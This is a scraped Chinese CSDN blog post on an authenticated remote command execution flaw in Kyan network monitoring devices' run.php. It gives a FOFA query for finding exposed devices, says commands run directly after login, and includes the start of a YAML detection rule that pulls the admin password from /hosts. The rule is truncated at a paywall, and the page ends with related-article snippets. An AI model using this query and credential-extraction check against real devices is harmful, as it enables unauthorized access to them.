Kyan网络监控设备run.php远程命令执行漏洞(含批量验证poc)

已于 2024-04-03 15:16:20 修改
阅读量37 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-03 15:11:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137346622
版权
本文详细介绍了Kyan网络监控设备中run.php存在的远程命令执行漏洞,该漏洞配合账号密码泄露可能导致服务器权限被获取。修复建议包括更新官方补丁进行系统升级。
摘要由CSDN通过智能技术生成

漏洞描述
Kyan 网络监控设备 run.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
fofa
app=”Kyan设计”
漏洞复现
登陆后访问/run.php,可直接执行命令
 

image.png


检测poc规则编写

params: []
name: Kyan网络监控设备run.php远程命令执行漏洞
set: {}
rules:
- method: GET
  path: /hosts
  headers: {}
  body: ""
  search: 'Password=(?P<name>.+?)\n'
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"UserName=admin") && response.body.bcontains
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
rqrcode:一个编码QR码的Ruby库
04-12
RQR码 是一个用于创建QR码并将其呈现为各种格式的库。 它具有简单的界面以及所有标准QR码选项。... new ( 'https://kyan.com' ) puts qr . to_s xxxxxxx xxxxxxx xxx xxxxxxx x x x xxx xx x x x xxx x xx x x xx x xx
【攻防演练】【HW】【poc】【修复建议】Nacos Derby 远程命令执行漏洞
zzxx191z的博客
07-25 340
Nacos Derby命令执行漏洞利用脚本,默认使用User-Agent绕过漏洞进行利用https://github.com/Wileysec/nacos_derby_rce。1.开启Nacos derby数据库接口鉴权。[以下poc有些问题,推荐去github直接下载]
推荐项目:现代化的远程系统监控工具 —— Ruptime进化版
gitblog_00011的博客
06-20 250
推荐项目:现代化的远程系统监控工具 —— Ruptime进化版 ruptimepoor man’s ruptime项目地址:https://gitcode.com/gh_mirrors/ru/ruptime 在数字化时代,系统管理员和开发者面临着日益复杂的网络环境管理挑战。回忆过去,Berkeley的“r”命令组,如rlogin, rwho, 提供了基础的远程访问与监控功能,但随着网络安全性和隐...
编写Poc:Yapi远程命令执行漏洞
soldi_er的博客
07-12 1016
文章目录使用Docker构建Yapi(Ubuntu环境)访问yapi镜像,测试漏洞自动化探测脚本FOFA批量探测(python3)单url探测(python2)参考 使用Docker构建Yapi(Ubuntu环境)   (1)创建mongoDB数据卷: docker volume create mongo_data_yapi   (2)启动MongoDb docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo   (3)从阿里
网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
网站安全专家
08-23 1365
S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器管理员权限,网站数据被篡改,数据库被盗取都会发生。 目前我们SINE安全对该S2-057漏洞的测试,发现受影响的版本是Apache Struts 2.3–ApacheStruts2.3.34、Apa...
更新:远程命令执行POC演示公布 | 微软SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告
爱国小白帽
04-15 959
更新:远程命令执行POC演示公布 | 微软SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告 原创 红雨滴团队 [奇安信威胁情报中心](javascript:void(0)???? 今天 文档信息 编号 QiAnXinTI-SV-2020-0008 关键字 SMB CVE-2020-0796 发布日期 2020年3月11日 更新日期 2020年4月14日 TLP...
Timer 25: 极简计时-crx插件
04-02
语言:Deutsch,English,Français,español,...代码及问题报告:• Github 项目页面:https://github.com/kyan001/WebExtensions/tree/master/ChromeExt_Timer25• 帮助 & Bug 提交:https://github.com/kyan001/WebExte
通达OA RCE远程代码执行漏洞分析(EXP&POC)
风起的博客
04-27 7268
目录前记任意文件上传分析任意文件包漏洞奇淫巧技官方修复补丁POC&EXP利用后记 前记     在上个月,通达OA爆出了任意文件上传及任意文件包漏洞,影响版本非常广,这两个漏洞结合可以获取shell权限,为什么在漏洞爆出一个月后我才写这篇文章呢,因为我也是最近才看到的。所以我也赶忙的写完EXP和POC就发了这篇文章,下面我会从代码层进行审计,分析...
更新 | 远程命令执行POC被公开发布:微软SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告
爱国小白帽
06-03 1146
更新 | 远程命令执行POC被公开发布:微软SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告 原创 红雨滴团队 [奇安信威胁情报中心](javascript:void(0)???? 昨天 文档信息 编号 QiAnXinTI-SV-2020-0008 关键字 SMB CVE-2020-0796 发布日期 2020年3月11日 更新日期 2020年6月2日 TLP WHITE 分析团队 奇安信威胁情报中心 通告概述 2020年3月11日,某国外安全公司发布了
端口隔离配置的实验
zhgjx_ywz的博客
09-28 766
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 461
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
云计算中过等保三级需要的网络安全设备及详细讲解
weixin_59571541的博客
09-29 828
随着云计算技术的发展,数据的存储和处理逐渐向云端迁移,这在提高工作效率的同时,也带来了许多安全挑战。在中国,《网络安全等级保护条例》将网络安全分为五个等级,其中等级保护三级(等保三级)是针对中等风险环境下的安全要求。要保障云计算环境中的数据安全和业务连续性,必须部署一系列合适的网络安全设备。本文将详细介绍等保三级所需的主要网络安全设备
网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 222
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证
Web安全 - 跨站点请求伪造CSRF(Cross Site Request Forgery)
小工匠
09-29 1272
CSRF (Cross-Site Request Forgery,跨站请求伪造) 是一种攻击方式,攻击者诱导用户在不知情的情况下发起非授权的请求。例如,用户在登录某个站点后,攻击者通过社交工程等手段诱使用户点击包恶意请求的链接,利用用户已登录的状态,发起用户意图之外的操作,如转账、修改账户设置等。:在每次受保护的请求中,服务器生成一个唯一的CSRF Token,注入到表单或请求头中。:对于敏感操作,可以要求用户进行额外的身份验证,如验证码或短信验证,防止攻击者即便利用用户的认证状态,也无法完成关键操作。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1166
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 993
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
什么是“0day漏洞”?
分享关于Java编程、数据库管理和信息安全方面的最佳实践
09-29 681
0day漏洞是信息安全中的“幽灵”,因为它的隐蔽性和破坏性往往超出我们的预期。虽然普通用户和企业无法完全规避0day漏洞,但通过保持良好的安全习惯和使用合适的防护工具,可以在一定程度上降低受到0day攻击的风险。信息安全永远在变,防护措施也需要不断更新。在快速发展的网络环境中,我们只有时刻保持警惕,才能最大限度地保护我们的数据和隐私。
选择网络安全模式启动Windows系统,解决PC无法连接网络问题
dvlinker的技术专栏
10-04 1859
选择网络安全模式启动Windows系统,解决PC无法连接网络问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值